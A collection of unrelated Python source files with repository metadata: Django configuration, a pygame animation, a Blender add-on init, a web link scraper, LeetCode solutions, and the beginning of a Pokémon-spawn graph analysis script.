137c40c895ad025236a13be9645d12e8973d5ff2
|
refs/heads/master
| 2021-01-19T05:23:51.152778
| 2017-04-06T13:18:30
| 2017-04-06T13:18:30
| 87,430,701
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 79
|
py
|
# -*- coding:utf-8 -*-
# E:/PycharmProjects/
# create by boxiao on 2016/12/29
|
[
"1533880208@qq.com"
] |
1533880208@qq.com
|
4692a97be5655bafc7b9444570fcddb2c65deec0
|
543c7d3f8d5c36830c85784c6f9b694dfa82088b
|
/epic_events/epic_events/epic_events/urls.py
|
34a359eb7d4c8b05116ec7316ca499351d6093ee
|
[] |
no_license
|
pandavaurien/Openclassroom_projet_12
|
3959294ffd422a9abc3924e29b08255f227b3416
|
8d4772286fedb8d4989906b51d44e66e296fc459
|
refs/heads/master
| 2023-08-30T03:38:15.772621
| 2021-11-16T09:48:17
| 2021-11-16T09:48:17
| 417,076,693
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,485
|
py
|
"""epic_events URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from rest_framework.routers import SimpleRouter
from clients.views import ClientViewSet
from events.views import EventViewSet
from contracts.views import ContractViewSet
from rest_framework_simplejwt.views import (
TokenObtainPairView,
TokenRefreshView,
)
router = SimpleRouter()
router.register(r'clients', ClientViewSet, basename='clients')
router.register(r'contracts', ContractViewSet, basename="contracts")
router.register(r'events', EventViewSet, basename='events')
urlpatterns = [
path('admin/', admin.site.urls),
path('login/', TokenObtainPairView.as_view(), name='login'),
path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),
path('api-auth/', include('rest_framework.urls')),
path(r'', include(router.urls)),
]
|
[
"a.jurquet@gmail.com"
] |
a.jurquet@gmail.com
|
6867238cab9e0a5e21c60e60b01bb5571a43e0be
|
eec4d938713409db8f6127456bc77dd69749e7f7
|
/todo/tasks/migrations/0001_initial.py
|
e2337bffb0cf977ca00020268561d4f4d74ae938
|
[] |
no_license
|
shreyasingh12/TODO-APP
|
e5d65c65c94c2b14c171134746a5b70014bd7197
|
0950a55e5328763b6831977f40be7f2bde801b8c
|
refs/heads/master
| 2022-09-16T07:45:08.835197
| 2020-05-27T07:01:42
| 2020-05-27T07:01:42
| 267,244,318
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 621
|
py
|
# Generated by Django 3.0.5 on 2020-05-09 16:30
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Task',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('complete', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
],
),
]
|
[
"sshreya0003@gmail.com"
] |
sshreya0003@gmail.com
|
6b1dedb0d9049ca2347fb1df6006b27379b97dc8
|
965c1c4cf64374e5ea4bd0d2c08f9fb8ac4bdc45
|
/artige_product_pages/users/apps.py
|
0c4c72c9811ecdd92343c90f8ea550b624cfb339
|
[
"MIT"
] |
permissive
|
alinik/artige_product_pages
|
48e790bf09442229e5f40aa4a79227243d87d35f
|
f98a7b6fc07cf71c3ada6e2c50534421f84b5883
|
refs/heads/master
| 2021-10-28T12:14:05.142387
| 2019-04-05T16:37:44
| 2019-04-05T16:37:44
| 177,163,393
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 263
|
py
|
from django.apps import AppConfig
class UsersAppConfig(AppConfig):
name = "artige_product_pages.users"
verbose_name = "Users"
def ready(self):
try:
import users.signals # noqa F401
except ImportError:
pass
|
[
"ali@nikneshan.com"
] |
ali@nikneshan.com
|
37b532102a0518ee4b69422056e3d8f4bd0c067e
|
d1d345e065ec120775663759d6c906c22aa776f9
|
/pytest_homework3/test_hook.py
|
cedf82c062b1ad71d21ea16d5d23b5138f300594
|
[] |
no_license
|
Clown136/jiusheng_project
|
253e98cbcf65d81f4e054aba1ca3d153ff92c475
|
4d513d6a1a15e28854e1ba6dca4b56d42b366473
|
refs/heads/master
| 2022-12-28T01:31:25.040883
| 2020-09-22T10:15:53
| 2020-09-22T10:15:53
| 283,638,439
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 251
|
py
|
def test_case(cmdoption):
print(f"env环境下读取的值为:", cmdoption)
def test_case1(cmdoption1):
print(f"env环境下读取的值为:", cmdoption1)
def test_case2(cmdoption2):
print(f"env环境下读取的值为:", cmdoption2)
|
[
"1363643890@qq.com"
] |
1363643890@qq.com
|
6d656693f400eb644f9e1c446f6736d6fa7a27ac
|
9cc392b30ea3c74bc190c994ede882eee6d59813
|
/animation_nodes/__init__.py
|
028d09157141ea2e9648c1ec7084a796f5d60633
|
[] |
no_license
|
BitByte01/myblendercontrib
|
621f5df293d11d14a749fd1405170a355efab8ea
|
45f96e8195dae1b1ec72b3094c735fab12cfbd87
|
refs/heads/master
| 2020-12-25T21:00:53.487662
| 2015-04-07T08:53:22
| 2015-04-07T08:53:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,244
|
py
|
'''
Copyright (C) 2014 Jacques Lucke
mail@jlucke.com
Created by Jacques Lucke
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import importlib, sys, os
from nodeitems_utils import register_node_categories, unregister_node_categories
import nodeitems_utils
from bpy.types import NodeTree, Node, NodeSocket
from fnmatch import fnmatch
from bpy.props import *
bl_info = {
"name": "Animation Nodes",
"description": "Node system for more flexible animations.",
"author": "Jacques Lucke",
"version": (0, 0, 1),
"blender": (2, 7, 2),
"location": "Node Editor",
"category": "Animation",
"warning": "alpha"
}
# import all modules in same/subdirectories
###########################################
currentPath = os.path.dirname(__file__)
if __name__ != "animation_nodes":
sys.modules["animation_nodes"] = sys.modules[__name__]
def getAllImportFiles():
"""
Should return full python import path to module as
animation_nodes.nodes.mesh.mn_mesh_polygon_info
animation_nodes.sockets.mn_float_socket
"""
def get_path(base):
b, t = os.path.split(base)
if __name__ == t:
return ["animation_nodes"]
else:
return get_path(b) + [t]
for root, dirs, files in os.walk(currentPath):
path = ".".join(get_path(root))
for f in filter(lambda f:f.endswith(".py"), files):
name = f[:-3]
if not name == "__init__":
yield path + "." + name
animation_nodes_modules = []
for name in getAllImportFiles():
mod = importlib.import_module(name)
animation_nodes_modules.append(mod)
reload_event = "bpy" in locals()
import bpy
from animation_nodes.mn_execution import nodeTreeChanged
class GlobalUpdateSettings(bpy.types.PropertyGroup):
frameChange = BoolProperty(default = True, name = "Frame Change")
sceneUpdate = BoolProperty(default = True, name = "Scene Update")
propertyChange = BoolProperty(default = True, name = "Property Change")
treeChange = BoolProperty(default = True, name = "Tree Change")
skipFramesAmount = IntProperty(default = 0, name = "Skip Frames", min = 0, soft_max = 10)
redrawViewport = BoolProperty(default = True, name = "Redraw Viewport", description = "Redraw the UI after each execution. Turning it off gives a better performance but worse realtime feedback.")
class DeveloperSettings(bpy.types.PropertyGroup):
printUpdateTime = BoolProperty(default = False, name = "Print Global Update Time")
printGenerationTime = BoolProperty(default = False, name = "Print Script Generation Time")
executionProfiling = BoolProperty(default = False, name = "Node Execution Profiling", update = nodeTreeChanged)
import animation_nodes.mn_keyframes
class Keyframes(bpy.types.PropertyGroup):
name = StringProperty(default = "", name = "Keyframe Name")
type = EnumProperty(items = mn_keyframes.getKeyframeTypeItems(), name = "Keyframe Type")
class KeyframesSettings(bpy.types.PropertyGroup):
keys = CollectionProperty(type = Keyframes, name = "Keyframes")
selectedPath = StringProperty(default = "", name = "Selected Path")
selectedName = EnumProperty(items = mn_keyframes.getKeyframeNameItems, name = "Keyframe Name")
newName = StringProperty(default = "", name = "Name")
selectedType = EnumProperty(items = mn_keyframes.getKeyframeTypeItems(), name = "Keyframe Type")
class AnimationNodesSettings(bpy.types.PropertyGroup):
update = PointerProperty(type = GlobalUpdateSettings, name = "Update Settings")
developer = PointerProperty(type = DeveloperSettings, name = "Developer Settings")
keyframes = PointerProperty(type = KeyframesSettings, name = "Keyframes")
# Reload
# makes F8 reload actually reload the code
if reload_event:
for module in animation_nodes_modules:
importlib.reload(module)
# register
##################################
def register():
# two calls needed
# one for registering the things in this file
# the other everything that lives in the fake 'animation_nodes'
# namespace. It registers everything else.
bpy.utils.register_module(__name__)
bpy.utils.register_module("animation_nodes")
categories = mn_node_register.getNodeCategories()
# if we use F8 reload this happens.
if "ANIMATIONNODES" in nodeitems_utils._node_categories:
unregister_node_categories("ANIMATIONNODES")
register_node_categories("ANIMATIONNODES", categories)
bpy.types.Scene.mn_settings = PointerProperty(type = AnimationNodesSettings, name = "Animation Node Settings")
print("Loaded Animation Nodes with {} modules".format(len(animation_nodes_modules)))
def unregister():
bpy.utils.unregister_module(__name__)
bpy.utils.unregister_module("animation_nodes")
unregister_node_categories("ANIMATIONNODES")
if __name__ == "__main__":
register()
|
[
"Develop@Shaneware.Biz"
] |
Develop@Shaneware.Biz
|
a22814d087c6bd23f7827d8cb60915dcdb39e13f
|
5f88f96aaad8c97cbdadefa3fc5ba5e6afea4c42
|
/modAux.py
|
fcb2ac1a4294e09c416acbc71715909ffe1652c1
|
[
"MIT"
] |
permissive
|
AbeJLazaro/reconocimientoGatos
|
e7c04a4723d5d0fa5ec005e1189c8c7d90cffbd5
|
63f5a969d41e23dd7c596b2d8ffa1f6723e9685e
|
refs/heads/main
| 2023-03-04T04:58:34.769999
| 2021-02-18T08:56:06
| 2021-02-18T08:56:06
| 339,949,355
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,021
|
py
|
'''
Autor: Lázaro Martínez Abraham Josué
Fecha: 17 de febrero de 2021
Titulo: modAux.py
'''
import numpy as np
import matplotlib.pyplot as plt
import h5py
def load_data():
train_dataset = h5py.File('datos/train_catvnoncat.h5', "r")
train_set_x_orig = np.array(train_dataset["train_set_x"][:]) # your train set features
train_set_y_orig = np.array(train_dataset["train_set_y"][:]) # your train set labels
test_dataset = h5py.File('datos/test_catvnoncat.h5', "r")
test_set_x_orig = np.array(test_dataset["test_set_x"][:]) # your test set features
test_set_y_orig = np.array(test_dataset["test_set_y"][:]) # your test set labels
classes = np.array(test_dataset["list_classes"][:]) # the list of classes
train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))
test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))
return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes
if __name__ == '__main__':
load_data()
|
[
"abrahamlazaro@comunidad.unam.mx"
] |
abrahamlazaro@comunidad.unam.mx
|
4789a773ce161e6f302d1d3c00c355334c59bb1e
|
bc82526544eb82fad2fa2c40a6651b15c39d7eba
|
/pepe.py
|
d617e14ddc98d9df31ad82a596c8d725b0f314fe
|
[] |
no_license
|
river-sneed/pepe
|
6aeb55b92312c07ef54e1c245a84b5faee9da477
|
3a0f9b33b5b43f6445e1c2aaeef3b51fa3263a75
|
refs/heads/master
| 2020-07-15T18:05:34.887703
| 2016-12-02T20:43:27
| 2016-12-02T20:43:27
| 73,960,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,055
|
py
|
# Computer Programming 1
# Unit 11 - Graphics
#
# A scene that uses pepes to be lit.
#River Sneed
#11/28/2016
# Imports
import pygame
import random
import math
print ("press keys and leave them toggled until you see fit to do otherwise")
print("f = rainbow fun")
print("space = lit")
print ("s = smoke")
print ("make sure you have clicked on game window to be able to be able to use it")
# Initialize game engine
pygame.init()
# Window
SIZE = (800, 600)
TITLE = "pepe"
screen = pygame.display.set_mode(SIZE)
pygame.display.set_caption(TITLE)
# Timer
clock = pygame.time.Clock()
refresh_rate = 30
# Colors
SKY = (135, 206, 250)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
ORANGE = (255, 125, 0)
YELLOW = (255, 255, 0)
SWEET_PEPE_GREEN = (104, 152, 76 )
SWEET_PEPE_BLUE = ( 35, 74, 252 )
SWEET_PEPE_RED = ( 169, 106, 64 )
RAINBOW_YELLOW = (255, 255, 0)
RAINBOW_BLUE = (0, 0, 255)
PURPLE = (83, 33, 158)
SMOKE = (81, 90, 104)
HAZE = (167, 171, 178)
MOON = (227, 223, 242)
def draw_pepe(x, y):
pygame.draw.ellipse(screen, SWEET_PEPE_BLUE, [x-10, y+40, 65, 40])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x-2, y+15, 75, 40])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x+5, y+1, 38, 50])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x+25, y+1, 38, 50])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x+20, y+7, 50, 17])
pygame.draw.rect(screen, SWEET_PEPE_RED, [x+22.5, y+37.5, 48.5, 7.5])
pygame.draw.ellipse(screen, SWEET_PEPE_RED, [x+19, y+37.5, 7.5, 7.5])
pygame.draw.ellipse(screen, SWEET_PEPE_RED, [x+65.5, y+37.5, 10.0, 3.7])
pygame.draw.ellipse(screen, SWEET_PEPE_RED, [x+65.5, y+41.5, 7.5, 3.7])
pygame.draw.ellipse(screen, WHITE, [x+45, y+11, 25, 9])
#pygame.draw.ellipse(screen, BLACK, [x+45, y+11, 25, 9], 3)
pygame.draw.ellipse(screen, WHITE, [x+20, y+11, 20, 9])
#pygame.draw.ellipse(screen, BLACK, [x+20, y+11, 20, 9], 3)
pygame.draw.ellipse(screen, BLACK, [x+25, y+11.5, 7.5, 7.5])
pygame.draw.ellipse(screen, BLACK, [x+52, y+11.5, 7.5, 7.5])
def draw_pepe_red(x, y):
pygame.draw.ellipse(screen, SWEET_PEPE_BLUE, [x-10, y+40, 65, 40])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x-2, y+15, 75, 40])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x+5, y+1, 38, 50])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x+25, y+1, 38, 50])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x+20, y+7, 50, 17])
pygame.draw.rect(screen, SWEET_PEPE_RED, [x+22.5, y+37.5, 48.5, 7.5])
pygame.draw.ellipse(screen, SWEET_PEPE_RED, [x+19, y+37.5, 7.5, 7.5])
pygame.draw.ellipse(screen, SWEET_PEPE_RED, [x+65.5, y+37.5, 10.0, 3.7])
pygame.draw.ellipse(screen, SWEET_PEPE_RED, [x+65.5, y+41.5, 7.5, 3.7])
pygame.draw.ellipse(screen, WHITE, [x+45, y+11, 25, 9])
pygame.draw.ellipse(screen, RED, [x+45, y+11, 25, 9], 3)
pygame.draw.ellipse(screen, WHITE, [x+20, y+11, 20, 9])
pygame.draw.ellipse(screen, RED, [x+20, y+11, 20, 9], 3)
pygame.draw.ellipse(screen, BLACK, [x+25, y+11.5, 7.5, 7.5])
pygame.draw.ellipse(screen, BLACK, [x+52, y+11.5, 7.5, 7.5])
pygame.draw.ellipse(screen, WHITE, [x+45, y+39.5, 7.5, 7.5])
pygame.draw.rect(screen, WHITE, [x+47, y+39.5, 40, 6])
pygame.draw.ellipse(screen, RED, [x+83, y+39.5, 7.5, 7.5])
pygame.draw.ellipse(screen, YELLOW, [x+83, y+39.5, 7.5, 7.5], 1)
def draw_smoke(x, y):
pygame.draw.ellipse(screen, SMOKE, [x, y, 13, 13])
def draw_sun(x,y):
pygame.draw.ellipse(screen, YELLOW, [575, 75, 100, 100])
def draw_moon(x,y):
pygame.draw.ellipse(screen, MOON, [575, 75, 100, 100])
''' make pepes '''
pepes = []
for i in range(42):
x = random.randrange(-100, 1600)
y = random.randrange(0,250)
pepes.append([x, y])
'''Make smoke'''
smoke = []
front_smoke = []
for i in range(200):
x = random.randint(0, 1000)
y = random.randint(-50,0)
smoke.append([x, y])
for i in range(150):
x = random.randint(0,1000)
y = random.randint(-30, 0)
front_smoke.append([x, y])
boring = True
daytime = True
lights_on = True
fence = True
# Game loop
done = False
while not done:
# Event processing
for event in pygame.event.get():
if event.type == pygame.QUIT:
done = True
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
boring = not boring
elif event.key == pygame.K_s:
daytime = not daytime
elif event.key == pygame.K_f:
fence = not fence
# Game logic
''' move pepes '''
for p in pepes:
p[0] -= 1
if p[0] < -100:
p[0] = random.randrange(800, 1600)
p[1] = random.randrange(0, 200)
for s in smoke:
s[1] -= 3
if s[1] > 0:
s[0] += math.sqrt(s[1])/10
if s[1] < 0:
s[0] = random.randrange(-50, 800)
s[1] = random.randrange(410, 700)
for f in front_smoke:
f[1]-= 5
if f[1] > 0:
f[0] += math.sqrt(f[1])/random.randint(10, 20)
if f[1] < 0:
f[0] = random.randrange(-50, 800)
f[1] = random.randrange(410, 700)
''' set sky color '''
if daytime:
sky = SKY
draw_sun(x,y)
else:
sky = HAZE
draw_moon(x,y)
''' set window color (if there was a house)'''
if lights_on:
window_color = YELLOW
else:
window_color = WHITE
# Drawing code
''' sky '''
screen.fill(sky)
''' sun '''
if daytime:
draw_sun(x,y)
else:
draw_moon(x,y)
if daytime:
pygame.draw.ellipse(screen, ORANGE, [-50, 200, 800, 1000], 10)
pygame.draw.ellipse(screen, RED, [-15, 190, 730, 800], 10)
pygame.draw.ellipse(screen, RAINBOW_YELLOW, [-7, 210, 715, 790], 10)
pygame.draw.ellipse(screen, GREEN, [-10, 220, 720, 810], 10)
pygame.draw.ellipse(screen, RAINBOW_BLUE, [-10, 230, 715, 815], 10)
pygame.draw.ellipse(screen, PURPLE, [-7, 240, 710, 810], 10)
else:
pass
''' clouds '''
for p in pepes:
x = p[0]
y = p[1]
if boring:
draw_pepe(x,y)
else:
draw_pepe_red(x,y)
''' smoke '''
for s in smoke:
if not daytime:
draw_smoke(s[0], s[1])
'''front smoke'''
for f in front_smoke:
if not daytime:
draw_smoke(f[0], f[1])
''' grass '''
pygame.draw.rect(screen, GREEN, [0, 400, 800, 200])
''' fence '''
y = 380
if fence:
for x in range(5, 800, 30):
pygame.draw.polygon(screen, WHITE, [[x+5, y], [x+10, y+5],
[x+10, y+40], [x, y+40],
[x, y+5]])
pygame.draw.line(screen, WHITE, [0, 390], [800, 390], 5)
pygame.draw.line(screen, WHITE, [0, 410], [800, 410], 5)
else:
for x in range(5, 800, 30):
pygame.draw.polygon(screen, RED, [[x, y], [x+5, y], [x, y+50], [x-5, y+50]])
pygame.draw.polygon(screen, ORANGE, [[x+5, y], [x+10, y], [x+5, y+50], [x, y+50]])
pygame.draw.polygon(screen, YELLOW, [[x+10, y], [x+15, y], [x+10, y+50], [x+5, y+50]])
pygame.draw.polygon(screen, GREEN, [[x+15, y], [x+20, y], [x+15, y+50], [x+10, y+50]])
pygame.draw.polygon(screen, BLUE, [[x+20, y], [x+25, y], [x+20, y+50], [x+15, y+50]])
pygame.draw.polygon(screen, PURPLE, [[x+25, y], [x+30, y], [x+25, y+50], [x+20, y+50]])
# Update screen
pygame.display.flip()
clock.tick(refresh_rate)
# Close window on quit
pygame.quit()
|
[
"noreply@github.com"
] |
river-sneed.noreply@github.com
|
ea7cf35b3c3783e32f505ac43d141170881c8250
|
33524b5c049f934ce27fbf046db95799ac003385
|
/2017/Turtule/lesson_1/fun.py
|
1a4171a3456c99abd720076e765828f9e7a6a3e9
|
[] |
no_license
|
mgbo/My_Exercise
|
07b5f696d383b3b160262c5978ad645b46244b70
|
53fb175836717493e2c813ecb45c5d5e9d28dd23
|
refs/heads/master
| 2022-12-24T14:11:02.271443
| 2020-10-04T04:44:38
| 2020-10-04T04:44:38
| 291,413,440
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 256
|
py
|
import turtle
def square(t):
x=75
ang=90
t.forward(x)
t.left(ang)
t.forward(x)
t.left(ang)
t.forward(x)
t.left(ang)
t.forward(x)
#t.left(ang)
t=turtle.Turtle()
t.shape("turtle")
square(t)
t.right(90)
square(t)
turtle.mainloop()
|
[
"mgbo433@gmail.com"
] |
mgbo433@gmail.com
|
c9ecfb211964d9eb944233d0119dcaab7410f68e
|
93e533204f4c1bcb60e30db5de4d02fb9bce0a19
|
/test/pa_shebeilianjie.py
|
e47572ba64e72152b97a08f4f59ad7144f9976dc
|
[] |
no_license
|
overoptimus/pythonTest
|
21b1feb8c6dbdfe2b0e118d14a2d62f1b6e22def
|
79cb1016ab2d72149246908c9ef99ef280bd7a3c
|
refs/heads/master
| 2021-07-25T10:01:12.281732
| 2020-05-07T08:09:52
| 2020-05-07T08:09:52
| 165,030,777
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 503
|
py
|
import requests
from bs4 import BeautifulSoup
url = 'http://oa.zycg.cn/td_xxlcpxygh/platform'
req = requests.get(url)
req.encoding = 'utf-8'
soup = BeautifulSoup(req.text, 'html.parser')
# print(soup.prettify())
tds = soup.find_all('td', attrs={'class': 'grade3',
'valign': 'top', 'align': 'left'})
a_s = tds[11].find_all('a')
with open('./urls.txt', 'w') as f:
for a in a_s:
f.write('http://oa.zycg.cn/' + a['href'] + '\n')
# a = a.find('a')
# print(a)
|
[
"1040570917@qq.com"
] |
1040570917@qq.com
|
ac26165098ea44d820dd16e971045dc0d37cdccc
|
92754bb891a128687f3fbc48a312aded752b6bcd
|
/Algorithms/Python3.x/145-Binary_Tree_Postorder_Traversal.py
|
8d1c7f402c7e9e4772c4b22aa6d41afe45ecd87f
|
[] |
no_license
|
daidai21/Leetcode
|
ddecaf0ffbc66604a464c3c9751f35f3abe5e7e5
|
eb726b3411ed11e2bd00fee02dc41b77f35f2632
|
refs/heads/master
| 2023-03-24T21:13:31.128127
| 2023-03-08T16:11:43
| 2023-03-08T16:11:43
| 167,968,602
| 8
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,606
|
py
|
# recursoin
# Runtime: 36 ms, faster than 74.54% of Python3 online submissions for Binary Tree Postorder Traversal.
# Memory Usage: 13.9 MB, less than 5.72% of Python3 online submissions for Binary Tree Postorder Traversal.
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def postorderTraversal(self, root: TreeNode) -> List[int]:
self.postorder = []
self.recursion(root)
return self.postorder
def recursion(self, node):
if not node:
return
if node.left:
self.recursion(node.left)
if node.right:
self.recursion(node.right)
if node.val is not None:
self.postorder.append(node.val)
# Runtime: 36 ms, faster than 74.54% of Python3 online submissions for Binary Tree Postorder Traversal.
# Memory Usage: 13.7 MB, less than 5.72% of Python3 online submissions for Binary Tree Postorder Traversal.
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def postorderTraversal(self, root: TreeNode) -> List[int]:
postorder = []
stack = [root]
while stack:
node = stack.pop()
if node:
postorder.append(node.val)
stack.append(node.left)
stack.append(node.right)
return reversed(postorder)
|
[
"daidai4269@aliyun.com"
] |
daidai4269@aliyun.com
|
9853f6870c6412e85cf8eb0bcdc4f330947b2f99
|
90c8fc381673d77cfa3725fd94964ae276c4978a
|
/opt_graph.py
|
f2b32b89fcf9f512c1edd0444ad43588be454316
|
[] |
no_license
|
gjeusel/opt_graph_EEL857
|
7aed5584d5c9451e58951838d0e576f1fb16b068
|
40f751d2293e3f1d6b8f76e4b5204436fe672cc1
|
refs/heads/master
| 2021-01-20T03:23:36.374544
| 2017-06-20T00:06:20
| 2017-06-20T00:06:20
| 89,538,074
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 33,024
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, re
reload(sys)
sys.setdefaultencoding('utf8') # problem with encoding
import argparse
import subprocess
import matplotlib
matplotlib.use("Qt4Agg") # enable plt.show() to display
import matplotlib.pyplot as plt
import logging as log
import errno # cf error raised bu os.makedirs
import pandas as pd
import seaborn as sns
import math
import itertools
import numpy as np
import networkx as nx
# import pygraphviz as pgv
import time
##############################################
######## Global variables : ########
# Paths
script_path = os.path.abspath(sys.argv[0])
working_dir_path = os.path.dirname(script_path)
default_csv_dir = working_dir_path+"/data/"
default_result_dir = working_dir_path+"/results/"
default_html_dir = working_dir_path+"/html_generated_by_python/"
# Cmap
from matplotlib.colors import ListedColormap
cmap_OrRd = ListedColormap(sns.color_palette("OrRd", 10).as_hex())
cmap_RdYlBu = ListedColormap(sns.color_palette("RdYlBu", 10).as_hex())
# Some colors
color_green = sns.color_palette('GnBu', 10)[3]
color_blue = sns.color_palette("PuBu", 10)[7]
color_purple = sns.color_palette("PuBu", 10)[2]
color_red = sns.color_palette("OrRd", 10)[6]
##############################################
def compute_dist(lat1, lng1, lat2, lng2):
""" Compute distance in km from lats and lngs. """
#{{{
# cf http://www.movable-type.co.uk/scripts/latlong.html
phi1 = math.radians(lat1)
phi2 = math.radians(lat2)
delta_phi = math.radians(lat2 - lat1)
delta_lambda = math.radians(lng2 - lng1)
a = math.pow(math.sin(delta_phi/2),2) \
+ math.cos(phi1) * math.cos(phi2) * math.pow(math.sin(delta_lambda/2),2)
c = 2 * math.atan2( math.sqrt(a), math.sqrt(1-a))
R = 6371 #[km]
distance = R*c
return distance
#}}}
# Function to convert Dataframe in nice colored table :
def render_mpl_table(data, col_width=4.0, row_height=0.625, font_size=14,
header_color='#40466e', row_colors=['#f1f1f2', 'w'], edge_color='w',
bbox=[0.1, 0, 1, 1], header_columns=0,
ax=None, **kwargs):
""" <pandas.DataFrame> to nice table. """
#{{{
import six
if ax is None:
size = (np.array(data.shape[::-1]) + np.array([0, 1])) * np.array([col_width, row_height])
fig, ax = plt.subplots(figsize=size)
ax.axis('off')
mpl_table = ax.table(cellText=data.values, bbox=bbox, rowLabels=data.index, colLabels=data.columns, **kwargs)
mpl_table.auto_set_font_size(False)
mpl_table.set_fontsize(font_size)
for k, cell in six.iteritems(mpl_table._cells):
cell.set_edgecolor(edge_color)
if k[0] == 0 or k[1] < header_columns:
cell.set_text_props(weight='bold', color='w')
cell.set_facecolor(header_color)
else:
cell.set_facecolor(row_colors[k[0]%len(row_colors) ])
return fig, ax
#}}}
class wrapperDataFrame:
"""
- df : <pandas.DataFrame> of all pokemons in the csv
schema : ['s2_id', 's2_token', 'num', name', 'lat', 'lng',
'encounter_ms', 'disppear_ms']
- pok_nml_few : <list of string> containing the pokemon names of interest
- df_few : <pandas.DataFrame> with only pokemons registers of interest
- df_counts (optionally computed) :
<pandas.DataFrame> of pokemons count
schema : ['Pokemon', 'Count']
- df_rarest (optionally computed) :
<pandas.DataFrame> reduced to a % of the rarest
"""
# s2_id and s2_token reference Google's S2 spatial area library.
# num represents pokemon pokedex id
# encounter_ms represents time of scan
# disappear_ms represents time this encountered mon will despawn
#{{{ Methods of wrapperDataFrame
def __init__(self, df_path=default_csv_dir+"pokemon-spawns.csv",
pok_nml_few=["Dragonair"]): #constructor
print "Reading csv ..."
self.df = pd.read_csv(df_path)
self.pok_nml_few = pok_nml_few
print "Constructing df_few with : ", self.pok_nml_few, "..."
self.construct_df_few()
print "Removing spawns out of San Fransisco ..."
self.clean_outofSF()
print "Removing spawns in double ..."
self.clean_spawns_pos_doubles()
def __str__(self):
# print ".df.head() = \n",self.df.loc[:,"num":"lng"].head() , "\n"
# print ".df_counts.tail(10) = \n", self.df_counts.tail(10) , "\n"
# print ".df_rarest.head() = \n", self.df_rarest.loc[:,"num":"lng"].head() , "\n"
print ".df_few = \n", self.df_few.loc[:,"num":"lng"]
return("")
def construct_df_few(self):
#{{{
self.df_few = pd.DataFrame()
for pok_name in self.pok_nml_few:
self.df_few = pd.concat( [self.df_few,
self.df.loc[self.df.loc[:,"name"] == pok_name] ] )
#}}}
def clean_spawns_pos_doubles(self):
""" Remove registers with the same lat AND lnd"""
#{{{
i = 0 ; i_end = self.df_few.shape[0] ;
k_end = self.df_few.shape[0] ;
while (i < i_end):
k = i+1
while (k<k_end):
# print "i=",i, " ; k=", k
bool_lat = self.df_few.iloc[i].loc["lat"] == self.df_few.iloc[k].loc["lat"]
bool_lng = self.df_few.iloc[i].loc["lng"] == self.df_few.iloc[k].loc["lng"]
if (bool_lat and bool_lng):
self.df_few = self.df_few.drop(self.df_few.index[[k]])
i_end = i_end - 1
k_end = k_end - 1
else:
k = k+1
i = i+1
#}}}
def clean_outofSF(self):
""" Keep only registers with 36<lat<38 and -125<lng<-120 """
#{{{
i = 0 ; i_end = self.df_few.shape[0] ;
while (i < i_end):
# print "i=",i"
bool_lat_l = (36 < self.df_few.iloc[i].loc["lat"])
bool_lat_r = (self.df_few.iloc[i].loc["lat"] < 38)
bool_lng_l = (-125 < self.df_few.iloc[i].loc["lng"])
bool_lng_r = (self.df_few.iloc[i].loc["lng"] < -120)
bool_lat = bool_lat_l and bool_lat_r
bool_lng = bool_lng_l and bool_lng_r
if not(bool_lat and bool_lng):
self.df_few = self.df_few.drop(self.df_few.index[[i]])
i_end = i_end - 1
else:
i = i+1
#}}}
